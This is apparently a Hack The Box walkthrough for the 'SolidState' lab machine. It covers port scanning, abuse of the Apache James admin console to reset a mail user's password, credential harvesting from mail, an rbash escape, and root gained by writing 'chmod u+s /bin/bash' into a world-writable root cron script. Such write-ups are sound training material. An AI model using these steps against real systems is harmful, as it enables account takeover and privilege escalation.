Enum

NMAP

Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-31 17:42 EDT
Nmap scan report for 10.10.10.51
Host is up (0.058s latency).

PORT     STATE SERVICE     VERSIONd
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)d
| ssh-hostkey:d
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)d
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)d
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp        JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.16.65 [10.10.16.65]),
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))                                                                                                                      
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel                                                                                                      

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                                 
Nmap done: 1 IP address (1 host up) scanned in 24.65 seconds 

Port 80 doesn’t show anything of interest.

Searching for james on exploitDB shows some an RCE which appears to work on JAMES Remote Admin 2.3..

┌──(bob㉿kali)-[~/htb/solidstate]
└─$ searchsploit james                   
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Apache James Server 2.2 - SMTP Denial of Service                                                                                                                                                            | multiple/dos/27915.pl
Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)                                                                                                                        | linux/remote/48130.rb
Apache James Server 2.3.2 - Remote Command Execution                                                                                                                                                        | linux/remote/35513.py
WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow                                                                                                                                         | windows/remote/944.c
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Let’s try with the metasploit module

Doesn’t appear like cron nor bash completion are working as targets.

Since we have root access to the admin panel

We can list the users

Existing accounts 6
user: james
user: thomas
user: john
user: mindy
user: mailadmin
setpassword mindy password
Password for mindy reset

So we connect to the mail server and authenticate as mindy

┌──(bob㉿kali)-[~/htb/solidstate]
└─$ telnet 10.10.10.51 110                                                                                                                                                                                                                1 ⨯
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready  
user mindy
+OK
pass password
+OK Welcome mindy 

[...]

RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

mindy:P@55W0rd1!2@

With mindy’s creds we get user.txt

We also note that we are not in a normal shell, this user’s shell is rbash

mindy@solidstate:~$ sudo -l
-rbash: sudo: command not found

Since we are in a restricted rbash shell

we can ssh with

┌──(bob㉿kali)-[~/htb/solidstate]                                                                                      
└─$ ssh mindy@10.10.10.51 -t "bash --noprofile" 

to escape the restricted shell and get a normal bash shell.

By running pspy32 we notice that a python script is being run by root which suggests it is a cronjob that is being run.

We notice that we have write access to the script.

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -al /opt/
total 16
drwxr-xr-x  3 root root 4096 Aug 22  2017 .
drwxr-xr-x 22 root root 4096 Jun 18  2017 ..
drwxr-xr-x 11 root root 4096 Aug 22  2017 james-2.3.2
-rwxrwxrwx  1 root root  105 Aug 22  2017 tmp.py

We use the example mentioned here by editing the script and inserting chmod u+s /bin/bash

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ /bin/dash 
# whoami
root
#